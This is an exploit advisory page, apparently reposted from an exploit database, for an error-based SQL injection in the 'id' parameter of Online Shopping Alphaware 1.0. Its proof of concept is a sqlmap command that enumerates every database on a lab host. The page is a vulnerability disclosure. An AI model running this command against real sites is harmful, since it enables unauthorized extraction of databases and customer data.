Saturday, November 23, 2024

Online Shopping Alphaware 1.0 – Error Based SQL injection

# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection
# Exploit Author: Moaaz Taha (0xStorm)
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
# Description
This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases.

#POC
sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10
            

Date: 2020-12-01

CVE: N/A

Platform: PHP

Bookmark
Please login to bookmarkClose
Share the word, let's increase Cybersecurity Awareness as we know it
Recommended:  phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)
- Sponsored -

Sponsored Offer

Unleash the Power of the Cloud: Grab $200 Credit for 60 Days on DigitalOcean!

Digital ocean free 200

Discover more infosec

RiSec.Mitch
Just your average information security researcher from Delaware US.

more infosec reads

Subscribe for weekly updates

explore

more

security